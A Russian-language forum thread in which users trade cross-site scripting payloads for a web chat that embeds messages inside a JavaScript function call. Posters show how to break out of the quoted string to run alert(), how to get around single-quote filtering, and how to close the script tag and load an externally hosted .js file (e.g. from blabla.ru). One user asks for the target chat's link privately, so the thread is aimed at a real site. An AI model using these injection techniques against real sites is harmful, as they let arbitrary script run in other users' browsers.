Сообщения вводятся в чат следующим образом : <script>top.pr('18:52:55','Вася','коля','петя, Саша, прииивааа............',1,0);</script> Какие будут идеи по поводу того как вставить теги в этот чат
твоя месага должна быть примерно такой- Code: приветааааа',1,0);alert('XAXA');top.pr('18:52:55','Вася','коля','петя, Саша, приветааааа алерт должен сработать без видимых изменений в странице
Так вставить не получается - alert('hacked') преобразовывается в alert(´Hacked´) т.е. ' заменяется =(( Есть у кого-нибудь идеи по этому поводу ?
попробуй с " : alert("hacked") можно так ещё: alert("hacked" а самый лучший способ, так: делаешь *.js через блокнот пишешь в нём alert('hacked') заливаешь куданить, например на народ.ру и в мессаге прописываешь: прииивааа............',1,0);</script><script/**/src=http://blabla.ru/a.js> поидее должно прокатить, но вот в последнем случае на странице вместо сообщения будет кака))))) -------- скинь мне в pm ссылку этого чата....
В этом случае он вместе с "/" вилезет, а почему не написать вобще пустой алерт, тоесть если тебе надо только одно слово Хакед допустим, то оно и без всяких знаков пройдет!
Кстати да! Сейчас попробовал и не выходит! НО почемуто иногда же получается(нмеогу вспомнить где, но то что выходило - 100% даю)! Ха ха ха! =)) Меня так в чате моего города называют! =))